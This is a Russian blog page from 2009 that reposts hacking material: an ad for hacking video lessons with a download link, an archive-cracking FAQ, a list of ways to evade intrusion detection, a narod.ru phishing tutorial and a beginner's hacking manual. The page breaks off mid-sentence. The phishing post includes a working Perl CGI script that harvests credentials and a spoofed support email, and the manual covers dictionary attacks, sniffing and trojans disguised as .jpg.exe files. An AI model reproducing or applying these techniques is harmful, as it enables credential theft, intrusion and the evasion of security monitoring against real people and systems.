-Метки

18 программ для "в контакте" 2009: cамые громкие дела ушедшего года 50 способов обойти систему обнаружения атак < пишем bat-вирусы и вирусы на pascal > bat файл за несколько секунд! com demotivators download master 5.9.2.1249 dr.web cureit! 4.44 exe... google-hack: поиск как метод атаки hdd для начинающих icq 7.2.3140 rus ignorance - mbr javascript:spellcheck(); led magic ball light skype 5.1.0.104 web install rus vksaver 2.2.2 xaker_cd_8.5.iso анонимность в usenet антивирус касперского 2011 аюрведическое питание боишься сотрудников фсб? василий ульянов введение в ломание windows-программ взлом компьютера взлом сайтов на narod.ru взломщики паролей видео для похудения вирус flashlight вирус заражающий com программы галина гроссманн гроссманн центр декларации-2010 демотивация день похудения диета для похудения диско шар жир здоровое питание как взломать пароль к архиву как дать отпор хакерам как похудеть до анорексии как похудеть к лету как похудеть при гиперинсулинизме как похудеть при сахарном диабете 2 как похудеть при сахарном диабете 2 типа как уберечься от взлома вконтакте как убрать жир с боков и живота как я ломал mustdie лишний вес меланин в таблетках меню для похудения мошенничества в интернете часть 1 огромный faq по взлому программ пакет инструментов для взома первая седина пираньи с фальшивой кредиткой в зубах питание для похудения пища для похудения полный мануал по взлому портрет российского хакера поседела похудение похудение боков похудение в домашних условиях похудеть без диет и упражнений похудеть без спорта похудеть быстро похудеть быстро в домашних условиях похудеть быстро и эффективно похудеть в лице похудеть в ногах правила приготовления пищи правильное похудение препарат для похудения приготовление пищи про взлом ранняя седина причины окрашивание седины руководство по написанию вирусов самый эффективный способ похудения сахарный диабет похудела сахароснижающие препараты сбросить вес быстро сбросить вес мужчине седина волос меланин синий экран смерти скачать hirens bootcd ver 13.1 скачать программу тренажёр клавиатуры «аполлон» способы быстрого похудения трояны: вопросы и ответы хакерские сайты ххх целлюлит что есть для похудения что есть чтобы похудеть что можно есть на диете что нельзя есть что нельзя при похудении эффективные методы похудения

 -Приложения

  • Перейти к приложению Открытки ОткрыткиПерерожденный каталог открыток на все случаи жизни
  • ТоррНАДО - торрент-трекер для блоговТоррНАДО - торрент-трекер для блогов
  • Перейти к приложению Стена СтенаСтена: мини-гостевая книга, позволяет посетителям Вашего дневника оставлять Вам сообщения. Для того, чтобы сообщения появились у Вас в профиле необходимо зайти на свою стену и нажать кнопку "Обновить
  • Перейти к приложению Я - фотограф Я - фотографПлагин для публикации фотографий в дневнике пользователя. Минимальные системные требования: Internet Explorer 6, Fire Fox 1.5, Opera 9.5, Safari 3.1.1 со включенным JavaScript. Возможно это будет рабо

 -ТоррНАДО - торрент-трекер для блогов

Делюсь моими файлами
    Скачал и помогаю скачать
      Жду окончания закачки

      Показать все (1)

       -Поиск по дневнику

      Поиск сообщений в Gafarov-91

       -Сообщества

      Читатель сообществ (Всего в списке: 2) Авто-Любитель Рецепты_блюд

       -Статистика

      Статистика LiveInternet.ru: показано количество хитов и посетителей
      Создан: 02.07.2009
      Записей:
      Комментариев:
      Написано: 1314




      WxyM3Hk0kURSWwX8mTONvW6vbW5WKpsn


      Видео-уроки по Хакерству (47 штук)

      Воскресенье, 12 Июля 2009 г. 00:41 + в цитатник
      Видео-уроки по Хакерству (47 штук)
      Год выпуска: 2008
      Размер файла: 48.1 Мб
      Кол-во партов: 1
      О программе: Наверное, у каждого из нас было (ну или есть) желание "напакостить" в сети, т.е. заняться хакерством. Но не каждому это было под силу!!! Но теперь, с помощью этих видео уроков, Вы научитесь не только красть чужие ICQ номерки и читать чужую почту, но и также узнаете как можно себя обезопасить от взлома.
      Продолжительность: 04:09:00
      Системные требования: любой проигрыватель
      Общий размер архива: 48.1 Мб (сжато с 3.6 Гб !!!)

      В архив входят следующие ролики:
      01. Как стать админом форума ITA v1.49
      02. Подбор пароля к мылу
      03. Переполнение буфера на практике
      04. cgi баг
      05. К чему приводит самая распостраненая ошибка в cgi
      06. cosmo-chat bug 3 (захват сайта)
      07. Взлом сервера
      08. Самый легкий способ дефейса
      09. Воруем мыло
      10. Как можно стать админом на сайте сделаным на Flat-nuke
      11. Баг в настройке серваков поставленных на фряхе (FreBSD)
      12. Как можно украсть красивый номер icq
      13. Просмотр чужих писем на mail.ru
      14. Удаленное выполнение php кода
      15. Пару баг xss в форуме MercuryBoard
      16. Как качать mp3 на халяву с сайта mp3search.ru
      17. Как качать mp3 на халяву с сайта mp3search.ru (способ 2)
      18. Серийник к проге mphone
      19. Ломка хорума punBB до версии 1.1.5
      20. Как зайти на чужой комп с помощью радмин
      21. Как незаметно можно читать почту на рамблере
      22. Тырим ник в чате
      23. Как реально можно получить рута на удаленном серве
      24. Еще один способ по угону ников в чатах на подобии www.neuch.ru/chat/
      25. Как использовать XSS в vBulletin 3x
      26. Как читать чужие письма на e-mail.ru и т.д.
      27. Как ломать сайт или почту на org.ru или nm.ru
      и т.д.

      Пароль на все архивы - hacker-pro.net


      Размер: 25.7 Mbhttp://fileshare167.depositfiles.com/auth-1247345174f9b439116ffcb432d42b9c-84.18.102.14-429014169-13744694-guest/FS167-5/xak.part1.rar?
      Размер: 22.38 Mb

      Как взломать пароль к архиву

      Воскресенье, 12 Июля 2009 г. 00:38 + в цитатник
      Как взломать пароль к архиву
      Возможно ли мгновенно взломать пароль ARJ, ZIP, RAR и других архивов?
      Нет, пароль архива не хранится в самом архиве, поэтому вы не можете его вытащить или изменить программу таким образом, чтобы пароль не запрашивался. Обычно архиваторы зашифровывают уже сжатый файл (а не сжимают зашифрованный) и сохраняют его контрольную сумму. Затем, при разархивации этот файл расшифровывается и контрольная сумма сверяется.

      Как взломать пароль ZIP-архива?
      Zip-архивы (pkzip, WinZip версии до 8.0) используют собственный алгоритм шифрования, который является очень нестойким. Это приводит к двум практическим уязвимостям. Во-первых, всегда можно осуществить атаку по открытому тексту (для этого нужен один незашифрованный файл из архива). Во-вторых, если архив создан WinZip или Infozip и содержит 5 или более файлов, то возможно произвести гарантированную расшифровку архива, независимо от длины и сложности пароля. Обе эти атаки занимают всего пару часов на современном компьютере. В последних версиях WinZip есть опция, позволяющая использовать стойкий алгоритм AES. В этом случае вышеописанные атаки неприменимы и остается перебор паролей. Современные взломщики паролей ZIP должны поддерживать обе атаки.

      Как взломать пароль RAR-архива?
      Архиватор RAR/WinRAR версии 2.х использовал собственный, но достаточно стойкий алгоритм шифрования. По крайней мере, не были известны атаки на RAR 2.0, кроме перебора. Начиная с версии 3.0, RAR использует стойкий алгоритм AES, который не допускает никаких атак эффективнее перебора паролей. Более того, реализация системы шифрования такова, что скорость перебора составляет всего около 100 паролей в секунду. Это позволяет считать RAR 3.x самым стойким с точки зрения перебора паролей из распространенных систем шифрования. Это означает, что нельзя взломать пароль RAR длиннее 6-7 символов, если нет никакой информации об этом пароле.

      Как взломать пароль ARJ-архива?
      Архиватор ARJ использует очень слабый алгоритм шифрования - он просто выполняет операцию XOR со паролем. Это приводит к тому, что если у Вас есть один незашифрованный файл из архива, то пароль на этот архив можно узнать мгновенно. У системы шифрования ARJ существуют и другие уязвимости. Например, первые три символа пароля можно узнать без полного перебора и сам перебор очень быстрый, поэтому могут быть взломаны пароли длиной до 12-14 символов.

      Можно ли взломать архив, если имеются незашифрованные (или не сжатые) файлы?
      Это называется "атака по открытому тексту". Результат зависит от используемого архива. Посмотрите на описание:

      - ARJ Да можно, пароли любой длины, мгновенно. Вам надо знать такое количество байтов сжатого файла, из скольких символов состоит пароль.
      - ZIP Да можно, (если не использовалось шифрование AES), пароли любой длины, вам надо знать по крайней мере 13 байтов сжатого файла. Может занять несколько часов на современном компьютере.
      - RAR 1.5 Да можно, пароли любой длины, вам надо знать 3-4 байта сжатого файла. Потом вам нужно произвести операций 232-240, которые могут занять несколько часов или дней.
      - RAR 2.x-3.x Нет нельзя.

      Как я могу взломать пароль самораспаковывающегося архива?
      Некоторые программы понимают самораспаковывающиеся архивы. Если ваша программа к ним не относится, просто удалить самораспаковывающийся заголовок, и тогда вы получите обычный архив. Для этого вам нужно прочитать техническое описание формата архива, найти сигнатуру, с которой начинается архив, и удалить все байты между началом файла и этой сигнатурой. Также вы можете найти эту сигнатуру, посмотрев на первые байты обычного архива.

      Метки:  

      50 способов обойти систему обнаружения атак

      Воскресенье, 12 Июля 2009 г. 00:37 + в цитатник
      50 способов обойти систему обнаружения атак
      Предисловие переводчика: небольшое введение к оригинальной статье было удалено, т.к. оно не относилось к делу. В нем описывалось как к Фреду пришла идея написать этот материал. Я его пропустил. Единственное, что надо добавить, - автор предупреждает, что к этому материалу надо относиться одновременно и серьезно и с определенной долей иронии. Многие пути применимы только для ОС Unix.

      Вставка посторонних символов в атаку, что обычно приводит к невозможности ее обнаружения. (Примечание переводчика - это касается систем обнаружения злоупотреблений, которые используют сигнатуры атак).
      Использование табуляций вместо пробелов в командах. Такое изменение разделителя может также привести к невозможности обнаружения атаки.
      Очень близкий путь к п.2. Вы могли бы изменить символ разделителя в системе (например, на %), что приведет к определенным проблемам с системами обнаружения атак.
      Измените стандартную последовательность действий при атаке. Например, если атака одинаково осуществляется и при 'a;b;c' и при 'b;a;c', то большинство систем обнаружения атак обнаружит первый вариант реализации атаки, но "заглохнет" на ее вариации.
      Разделите атаку между несколькими пользователями. Если взять пример выше, то 'a;b' осуществляет первый пользователь, а 'c' - второй. Такое разделение не обнаруживается многими системами обнаружения атак.
      Разделите атаку между несколькими сессиями (сеансами). Например, в такой последовательности: Login -> 'a;b' -> Logout -> Login -> 'c'.
      Разделите атаку между несколькими удаленными IP-адресами/системами. Например, с узлов X и Y запустите 'a' с X, 'b' с Y, а затем 'c' опять с X.
      Определите макрос для команды, используемой в атаке. Например, для команды 'cp' определите макрос '$ZZ' и в дальнейшем используйте его вместо 'cp'.
      Определите макрос как параметр, используемый в атаке. Например, используйте '$P' вместо строки '/etc/passwd'.
      Создайте скрипт, который заменит команды, используемые при атаке. Если тщательно реализовать эту операцию, то система обнаружения атак не сможет связать вместе название скрипта и команд для атаки, что приведет к ее пропуску.

      Дополнительная атака - добавьте комментарий к строке атаки.

      Используйте различные команды для выполнения одинаковых функций. Например, в Unix 'echo *' это почти то же самое, что и 'ls'.
      Измените имена в атаках. Например, если атака использует временный файл 'xxx', то измените его на 'yyy'.
      Создайте code-book translator для ключевых слов атаки. Это может быть выполнено пересылкой всех команд атаки через фильтр с использованием 'sed' для строковых замен.
      Кодируйте атаку в кодировке 'ebcdic' и измените тип терминала на 'ebcdic'. Система обнаружения атак не может определить атаки в различных кодировках.
      Реализуйте атаки по зашифрованному каналу.
      Используйте постфиксную нотацию для передачи данных или команд атаки, а затем возврат обратно по ее окончании. Система обнаружения атак не сможет распознать команды, посланные в таком виде. (Примечание переводчика - главное, чтобы атакуемая система тоже смогла понять обратный порядок).
      Включите полнодуплексный (full duplex) режим соединения с целью атаки. Дополнительные символы, создаваемые в этом режиме, будут путать систему обнаружения атак.
      Смешайте несколько атак, чередуя команды из каждой. Система обнаружения атак не должна правдоподобно распознавать ни одну из них.
      Кодируйте результаты атак таким образом, чтобы они не совпадали с шаблонами и не могли быть использованы для обнаружения атак. Например, вместо того, чтобы сразу послать себе по почте файл паролей, используя ошибку в sendmail, пропустите этот файл через скрипт 'sed' и замените все символы ':' на '-'. Тем самым, вы несущественно измените файл паролей, который уже не будет соответствовать шаблону.
      Атака "пропускается" через скрипт замены символов, написанный на awk. Это вводит в заблуждение систему обнаружения атак.

      Дополнительная атака - Выполните команды, выбираемые из таблицы выполненных перед этим команд по номеру строки этой таблицы. Например, для выполнения команды 'dir *.com' вы могли бы дать команду '15 *.com'.

      Подавите порт модуля слежения. Например, вы могли бы посылать echo на порт модуля слежения, тем самым делая невозможным прием других данных.
      Пошлите системе обнаружения атак пакеты PING большого размера. Многие системы будут выведены из строя.
      Уничтожьте систему обнаружения атак нападая на узел, на котором она установлена. Скомпрометировав этот узел, вы сможете вывести из строя и саму систему обнаружения атак.
      Создайте ложные записи в журналах регистрации для введения в заблуждение системы обнаружения атак. Например, создайте между событиями, характеризующими атаку, ложное событие, приводящее к обману системы обнаружения атак.
      Займите все дисковое пространство, выделенное для системы обнаружения атак. Например, вы можете создать очень много событий, которые переполнят журналы системы обнаружения атак и не позволяет ей регистрировать остальные атаки.
      Остановите процесс генерации и сбора данных об атаках. Например, вы можете породить большое число процессов, тем самым не давая создать системе обнаружения атак процесс для сбора необходимых данных.
      Заставьте систему обнаружения атак прервать соединение. Например, некоторые системы обнаружения атак могут завершать соединение с атакующим узлом. Вы можете создать трафик от узла, который вы хотите атаковать. Система обнаружения атак будет блокировать все пакеты, исходящие от скомпрометированного узла, тем самым давая вам возможность атаковать этот узел так, как вам надо.
      Повтор
      Повтор
      Используя редактор 'emacs' команды атаки заносите в буфер 'cmd' вместо набора на клавиатуре. Система обнаружения атак будет "видеть" только нажатия "горячих" клавиш, в то время, как интерпретатор команд на компьютере жертвы будет получать команды атаки. (Примечание переводчика - перевел криво, но смысл в целом понятен).

      Дополнительная атака - Осуществляйте атаку очень медленно. Т.к. размеры буфера для хранения регистрационных данных ограничены, то ваши первые команды для атаки могут быть потеряны к тому моменты, когда вы реализуете последние команды атаки.


      Измените таблицу маршрутизации, чтобы избежать попадания трафика к системе обнаружения атак.
      Небольшая модификация предыдущего примера.
      Используйте маршрутизацию источника, чтобы направить составляющие атаки по различным маршрутам, тем самым обманывая одиночные системы обнаружения атак.
      Начните исходящую сессию с жертвой через модем и по этому соединению проведите атаку. Сетевые системы обнаружения атак пропустят это нападение.
      Измените инфраструктуру между жертвой и системой обнаружения атак. С системах удаленного управления и сетевых системах обнаружения атак часто достаточно для этого изменить маршрутизацию трафика (например).
      Используйте промежуточный узел. Вашу атаку смогут блокировать, но в этом случае очень трудно отследить источник атаки, особенно в том случае, если ваши противники не умеют этого.
      Начните атаку с редко используемого или неиспользуемого порта. Очень часто системы обнаружения атак не контролируют такие порты.
      Используйте модифицированные протоколы, типа тех, которые обращают байты в слова (см. для примера PDP-11 и VAX).
      Используйте IPX над IP. Система обнаружения атак возможно обратит внимание на IP-пакеты, но не поймет их содержание.
      Используйте различные туннелированные протоколы для атаки.

      Дополнительная атака - определите свой собственный протокол и приложение и атакуйте через них.


      Атаки через коммутируемые соединения. Сетевые системы обнаружения атак никогда не обращают внимания на такие соединения. (Примечание переводчика - достаточно спорный момент. По крайней мере система RealSecure контролирует такие соединения).
      Создайте большое число ложных событий для увеличения уровня "шума" для системы обнаружения атак. Это серьезно увеличит время и ресурсы, затрачиваемые на обнаружение реальной атаки.
      Вставьте команды атаки внутрь макроса WinWord. Возможно система обнаружения атак не сможет обнаружить такую атаку.
      Вставьте команды атаки внутрь макроса различных программных пакетов (PowerPoint, Excel, Access, 123 и т.д.). Возможно система обнаружения атак не сможет обнаружить такую атаку.
      Поместите атаку в скомпилированную программу (т.е. троянский конь) и пусть жертва загрузить и выполнит этот файл.
      Используйте редко используемые протоколы для атаки. Возможно система обнаружения атак не сможет интерпретировать пакеты этого протокола.
      Транслируйте атаку на другой язык, отличный от того на котором была впервые опубликована оригинальная версия.
      Используйте нетехнические меры для атаки (например, социальный инжинириг). Т.к. системы обнаружения атак оперируют только битами и байтами, то многие из атак, используемых сегодня, не будут обнаружены.
      Нападайте на любой узел, функционирующий не под управлением Unix. Почти все существующие системы обнаружения атак не обнаруживают атаки, направленные не на Unix. (Примечание переводчика - этот путь уже давно устарел).
      Используйте одну из тысяч атак, пока не обнаруживаемых системами обнаружения атак.

      Дополнительная атака - создайте свою атаку.

      Метки:  

      Взлом сайтов на narod.ru

      Суббота, 11 Июля 2009 г. 11:21 + в цитатник
      Взлом сайтов на narod.ru

      Вот сидел я и решил всё таки написать чё-нить ;) По большому настоянию Eraser. Основа статьи это социальная инженерия, о которой уже было написано не мало. Не буду повторяться. Этот трюк можно провести со всеми новичками в сети Интернет. А рассматривать мы его будем уже на «банальном» хостинге narod.ru.(Повторюсь: его можно проделать на любом бесплатном хостинге, да даже и на платном моно попробовать ;) Начнём для проведения нижеописанных действий вам понадобятся:
      1. Мозги
      2. Руки
      3. Хостинг с поддержкой CGI
      4. Небольшое знание HTML
      И так ищем жертву… У нас она будет xxx.narod.ru. Вообще для этого случая нужно искать не заброшенный сайт. И чтобы в контактах было мыло типа xxx@narod.ru Теперь нагло сдираем face народа ;) Подправляем его, как надо, вставляем туда форму:


      Ещё надо написать write.cgi:
      &GetFormInput;

      $name=$field{'name'};
      $pass=$field{'pass'};

      sub GetFormInput {

      (*fval) = @_ if @_ ;
      local ($buf);
      if ($ENV{'REQUEST_METHOD'} eq 'POST') {
      read(STDIN,$buf,$ENV{'CONTENT_LENGTH'});
      }
      else {
      $buf=$ENV{'QUERY_STRING'};
      }
      if ($buf eq "") {
      return 0 ;
      }
      else {
      @fval=split(/&/,$buf);
      foreach $i (0 .. $#fval){
      ($name,$val)=split (/=/,$fval[$i],2);
      $val=~tr/+/ /;
      $val=~ s/%(..)/pack("c",hex($1))/ge;
      $name=~tr/+/ /;
      $name=~ s/%(..)/pack("c",hex($1))/ge;

      if (!defined($field{$name})) {
      $field{$name}=$val;
      }
      else {
      $field{$name} .= ",$val";
      }
      }
      }
      return 1;
      }
      open (OUTFILE, ">>pass.txt");
      print OUTFILE "$name";
      print OUTFILE "\n$pass";
      print OUTFILE "\n=======END=======\n\n";
      close (OUTFILE);
      print "Location: http://your_redirect_URL\n" ;

      Последняя строчка это перенаправление. Лучше послать на главную страницу народа. Всё наш сайт мы подготовили. ;)
      Теперь пишем этому "карапузу" (прим. Eraser'a : телепузу =)) письмо с анонимного мыла от support@narod.yandex.ru вида: "Здравствуйте ваш сайт пытались взломать и вам срочно не позже чем через 96 часов
      надо пройти повторную авторизацию. Идите по ссылке(ага вот тута он и отдаст нам пароль) а ссылочка, то вы скажите видно будет, что не народовская... А я скажу вам нифига... А зачем нам nslookup? Вот так вот. ;) короче ссылка будет вида: IP_ВАШЕГО_САЙТА/ sign.html . Усё готово.. теперь токо надо ждать ;).
      Дополнение:
      В доставание пароля вам поможет ваша фантазия при написание письма лопуху…

      Метки:  

      Полный мануал по взлому

      Воскресенье, 05 Июля 2009 г. 19:18 + в цитатник
      Полный мануал по взлому

      Я увлекаюсь защитой систем, а самый лучший админ - это хакер. Точно так же можно сказать, что самый лучший хакер - это злой админ :). Я написал эту статью в надежде, что она будет восприниматься как руководство по защите твоей собственности. Я пишу этот текст только в познавательных целях. Помни, что взлом не украшает человека и не ставит тебя автоматически в ряды элиты, хотя и таким образом тоже попадают в наши ряды. Я так же считаю своим долгом напомнить тебе про существование УК, в котором предусмотрены нехилые наказания за информационный вандализм. Рисунок 1. www.securetyfocus.com Приступим: Допустим, что у тебя есть какой-то сервер, который ты хочешь взломать или протестировать на защищенность от взлома. С чего нужно начинать? Что сделать в первую очередь? Сразу очень много вопросов и ни одного ответа. Четкой последовательности действий нет. Взлом - это творческий процесс, а значит, и подходить к нему приходиться творчески. Нет определенных правил и нельзя все подвести под один шаблон. Зато есть несколько рекомендаций, которых желательно придерживаться. Приступим: Самое первое, с чего начинается взлом или тест системы на дырявость - сканирование портов. Для чего? А для того, чтобы узнать, какие сервисы/демоны установлены в системе. Каждый открытый порт - это сервисная программа установленная на сервере, к которой можно подключиться и выполнить определенные действия. Например, на 21-м порту висит FTP сервис. Если ты сможешь к нему подключиться, то тебе станет доступной возможность скачивания и закачивания на сервер файлов. Но это только если ты будешь обладать соответствующими правами. Первое, что нужно просканировать - первые 1024 порта. Среди них очень много стандартных сервисов типа FTP, HTTP, Telnet и т.д. Все открытие порты - это дверь с замочком для входа на сервер. Чем больше таких дверей, тем больше вероятность, что какой-то замок не выдержит натиска и откроется. У хорошего админа открыты только самые необходимые порты. Например, если это WEB-сервер не предоставляющий доступ к почте, то нет смысла держать сервисы почтовых серверов. Рисунок 2. Сканирование портов Хороший сканер портов не только говорит номер открытого порта, но и показывает название установленного на нем сервиса. Желательно, чтобы сканер умел сохранять результат своей работы в каком-нибудь файле. Если этой возможности нет, то придется переписать все вручную и положить на видное место. В дальнейшем тебе пригодиться каждая строчка твоих записей. После этого можешь сканировать порты свыше 1024. Здесь стандартные сервисы встречаются редко. Зачем же тогда сканировать? А вдруг кто-то до тебя уже побывал здесь и оставил открытую дверку или протроянил сервак. Большинство троянов держат открытыми порты свыше 1024, поэтому если ты админ и нашел открытый порт с номером больше 1024, необходимо сразу насторожиться. Ну а если ты взломщик, то необходимо узнать имя трояна и найти для него клиентскую часть. На этом взлом может закончиться, потому что ты уже получил полный доступ к серваку без особых усилий :). Определяем ОС: Теперь мы знаем, какие двери у сервера открыты и чем мы можем воспользоваться. Но этого мало, потому что мы знаем какие есть двери, но не знаем, как их открыть. Сканирование - это всего лишь самый начальный этап, который тебе еще ничего особенного не сказал. Самое главное перед взломом - определить, какая ОС стоит на серваке. Желательно знать и версию, но это удается не всегда, да и на первых парах изучения системы можно обойтись без конкретизации. Для определения версии я могу посоветовать Shadow Scan. Не могу сказать, что она лучшая, но и к разряду худших отнести ее не имею права. Помимо определения ОС, прога умеет определять версии установленных сервисов. Это тебе может очень сильно помочь. Допустим, что ты узнал, что на серваке установлен WEB-сервер. Ты даже узнал, что ОС именует себя как "Окошки". Ты можешь предположить, что WEB-сервер именует себя как IIS, но это предположение может тебя обмануть. Для окошек есть реализация сильнейшего сервера Apache. А так как взлом разных серверов производиться по разному, то тебя должно в первую очередь волновать, кто именно сидит на 80-м порту - IIS или Apache. Единственный недостаток Shadow Scan - именно при определении версии ОС некоторые релизы Shadow Scan вылетали в синий экран. Но в последней версии этот баг вроде исправлен. Адрес этой распрекрасной тулзы ты можешь найти во врезке "Download". Юзаем порты : Итак, теперь ты знаешь, какая на сервере установлена ОС, какие порты открыты, и какие именно серверы висят на этих портах. Вся эта инфа должна быть у тебя записана в удобном для восприятия виде, хоть в файле, хоть на бумаге. Не ленись всю собранную инфу записывать и собирать в одну кучу. Помни, что даже компьютерные мозги иногда дают сбои, а человеческие делают это регулярно. Самое интересное, что чаще всего забывается самое необходимое. Ну а после взлома не поленись уничтожить, иначе ты облегчишь работу нашей доблестной милиции. Все записал? Ну, на этом можно остановить взлом. У тебя есть достаточно инфы для простейшего взлома по уже пройденным другими хаксорами следам. Просто посещай регулярно www.securityfocus.com. Здесь ты должен поискать информацию о дырявости установленных на серванте жертвы сервисов и самой ОС. Уже давно известно, что большая часть серверов (по некоторым данным 70%, а по некоторым 90%) в инете просто не латаются. Поэтому проверь все найденные эксплоиты на жертве, возможно, что-то подойдет. Если сервер хорошо залатан, то придется ждать появления новых дыр и експлоитов к установленным на сервере сервисам. Как только увидишь что-нибудь интересное, сразу качай експлоит и юзай свежую дырку, пока админ ее не залатал. Тестирование безопасности : Практически каждый день специалисты по безопасности находят в разных системах недочеты и откровенно говоря дыры или даже пробоины в системе безопасности. Все эти пробоины выкладываются в отчетах BugTraq на разных серверах. Я тебе уже посоветовал посещать www.securityfocus.com, чтобы следить за новостями, и сейчас не отказываюсь от своих слов. Новинки действительно надо смотреть на этом сервере, но ведь есть еще ворох старых дыр, которые могли быть, и не залатаны на сервере. Как же поступить с ними? Не ужели придется качать все эксплоиты и ручками проверять каждую пробоину? Ну конечно же нет. Существует громадное количество прог для автоматизации тестирования сервера на залатанность. Ты думаешь я должен посоветовать тебе какую-нибудь определенную прогу? Нет, я этого делать не буду, потому что все программы хороши. Не существует такой тулзы, в которой была бы база абсолютно всех потенциальных дыр. Поэтому качай все, что попадется под руку. Возможно что-то тебе и пригодиться. Взлом WWW-серванта : При взломе WWW-серванта есть свои особенности. Если на сервере крутятся CGI страницы, то взлом такого серванта нужно начинать совершенно по-другому. Для начала нужно просканировать его на наличие дырявых CGI скриптов. Ты не поверишь, но опять же по исследованиям крутых дядек, в инете громадное количество скриптов дырявые. Дырявость скриптов связана с тем, что для кодинга страничек используется Perl. Я ничего не имею против этого языка, но он сейчас достиг уровня универсала. На нем можно делать практически все, а не только форматировать текст. Поэтому в Perl очень много потенциально опасных функций. Но это не так страшно. Страшнее, когда ты можешь этим функциям передавать свои данные, когда скрипты не проверяют введенную пользователем инфу, а в чистом виде передают параметры в опасные функции. Другие языки (PHP, ASP и др) тоже имеют потенциально опасные функции, просто там их или поменьше, или они имеют дополнительную защиту. Единственный более менее защищенный язык - Java, который очень сильно тормозит систему, из-за чего его не охотно используют WEB-мастера. Я не собираюсь тебя лечить карявостью языков кодинга, потому что главная корявость - руки программера. Из-за громадной нехватки спецов в нашей любимой области, кодингом стали заниматься все кому не лень. Многие программеры самоучки даже не пытаются задуматься о безопасности. А тебе это только на руку. И так, твоя главная задача - запастись парочкой хороших CGI-сканеров. Какой лучше? Ответ однозначный - ВСЕ. Даже в самом плохом сканере может оказаться инфа о такой уязвимости, о которой не известно даже самому крутому. А главное, что по закону подлости именно эта уязвимость окажется доступной на серваке. Мы очень много упоминали о разных сканерах на страницах журнала, и каждый хвалил свой вариант. Я советую тебе взять подшивку Х и скачать все сканеры, упоминавшиеся на наших страницах. Серп и молот : Там где не возможно взломать сервер с помощью мозгов, всегда можно воспользоваться чисто русским методом - серпом и молотом. Это не значит, что серп нужно представлять к горлу админа, а молотком стучать по макушке. Просто всегда можно воспользоваться тупым подбором паролей. Давай снова обратимся к статистике. Все исследовательские конторы пришли к одному и тому же выводу, что большинство ушастых выбирают в качестве пароля имена своих любимых собачек, кошечек, даты рождения или номера телефонов. Так что хорошо подобранный словарь может сломать практически любую систему, потому что везде есть ламеры. Ты до сих пор еще не веришь мне? Давай вспомним знаменитейший червь Морриса, который проникал в систему, взламывая ее по словарю. Словарь был достаточно маленький и состоял менее чем из ста слов. Помимо этого, червь использовал в переборе слова из словаря установленного в системе. Там тоже слов не так уж много. И вот благодаря такому примитивному алгоритму, червь смог поразить громаднейшее число компов и серваков. Это был один из самых массовых взломов!!! Взлом по словарю очень часто используется для взлома мыльников, FTP паролей и другой чешуи. Но прежде чем приступать к такому взлому, советую хорошо отредактировать словари имен и паролей. Очень важно знать, какую систему ты взламываешь. Например, если это оконный сервер, то желательно, чтобы среди логинов был "Администратор". Ну а если это *nix система, то обязательно должен присутствовать "root", а все логины типа "Администратор" можно послать куда подальше. Неплохо было бы вставить в словарь любые имена и пароли используемые по умолчанию для разных сервисов. Очень часто админы забывают или просто ленятся поменять пароли на сервисы, которые запущены, но они ими не пользуются. Эта лень очень часто проявляется у админов окошек и это связано с тем, что в окошках уровень знаний спецов намного ниже. Например, я очень много встречал MS SQL Server 7.0 c логином по умолчанию в "sa" и абсолютно без пароля. Наверно поэтому M$ собирается убрать этот логин уже в следующей версии своего сервера баз данных. Для тупого перебора я опять могу посоветовать Shadow Scan (ну люблю я эту тулзу, что тут поделаешь). В нем есть очень хороший генератор словарей и реализованы подборщики по всем основным протоколам. Взлом локалки : В локалке есть свои особенности. Например, если она построена на основе коаксиала или витой пары соединенной через хабы, то весь сетевой трафик обязательно проходит через твою машину. Почему же ты его не видишь? Просто ОС и сетевуха сговорились и не показывает тебе чужой трафик. Но если очень сильно захотеть, то можно воспользовавшись снифером пронюхать все данные проходящие мимо твоей сетевой карточки. Сейчас в сети можно скачать громадное количество сниферов и примочек к ним. Я опять не буду советовать тебе что-то конкретное, потому что лично я не могу выделить однозначного лидера среди сниферов. Разные версии заточены под разные нужды, и тут нужно выбирать именно из этого соображения. Если ты конкретно ищешь пароли, то тебе нужен тот, что умеет выделять информацию о регистрации из общего трафика сети. Троянус : Самый тупой и самый ненадежный в отношении админов способ. Хотя админы и бывают ламерами, но на такие шутки уже никто не катит. Но кто сказал, что в сетке существуют только админы? Есть еще куча ламеров с большими привилегиями и маленькими мозгами. Вот именно их и надо троянить. Как забрасывать троян? Самый распространенный способ - почтовый ящик. Просто даешь трояну какое-нибудь заманчивое имя и отправляешь письмо жертве. Если он запустит твой трой, то считай, что ты царь и бог на его компе. Теперь тебе будет доступно все, что может для тебя сделать твой боевой конь. Рисунок 3. www.void.ru Какое дать имя, чтобы заинтересовать ламера? Очень просто, окна очень часто прячут расширения всех зарегистрированных в системе типов файлов. В этом случае, если ты назовешь файл как Anna_Kurnikova.jpg.exe, окна спрячут последнее расширение и любой лам подумает, что видит картинку. Для большей надежности, файл лучше всего назвать даже так: Anna_Kurnikova.jpg...........exe. В этом случае, если даже расширение не прячется по умолчанию, его все равно видно не будет. Любое письмо с трояном желательно снабдить хорошим текстом, чтобы заинтересовать чела запустить находящийся в нем файл. Итог : Эта статья не претендует на полноту, но я постарался дать все необходимые начальные сведения. Просто нас очень часто упрекают, что мы забываем про начинающих, и очень часто грузят вопросами типа: "Как взломать сервант?". Теперь ты сможешь залезть в танк и катиться дальше вместе с нами. Я заведомо не затрагивал тему получения халявного инета, потому что тут очень много своих особенностей. Но один из возможных способов я все же описал - трояны. Вообще, этот способ практически универсальный и может использоваться везде. Я так же надеюсь, что продвинутые челы тоже смогли найти для себя нечто интересное или новое. Покедова, надеюсь еще увидимся. Дополнительная инфа : www.cert.ru - хороший сервант по известным дырам. Радует, что он на русском, а огорчает редкость обновления и не все дыры описываются. www.cert.org - то же самое, что и предыдущее, только на английском языке. www.securityfocus.com - это я тебе уже рекомендовал, поэтому просто напоминаю. www.void.ru -отличный сервант на русском языке. Можешь сделать его стартовой страницей. Не верь глазам своим! : Сейчас мы поговорим о том, как различные проги определяет семейство ОС установленной на серваке. Для этого есть несколько способов: 1. По реализации протокола TCP/IP. Разные корпорашки по разному реализуют стек протоколов в своих ОС. Программа просто анализирует ответы на запросы от сервера и делает вывод об установленной ОС. В основном этот вывод расплывчатый типа Windows или Linux. Точную версию таким образом сказать невозможно. Допустим, что прога сказала, что на серваке установлен Linux, но какой именно дистрибутив тебе никто не скажет. А ведь дыры в разных дистрибутивах разные и поэтому такая инфа - это только половина необходимого тебе для взлома сервера. 2. По ответам разных сервисов. Допустим, что на сервере жертвы есть анонимный доступ по FTP. Тебе нужно всего лишь присоединиться к нему и посмотреть сообщение приглашения в систему. По 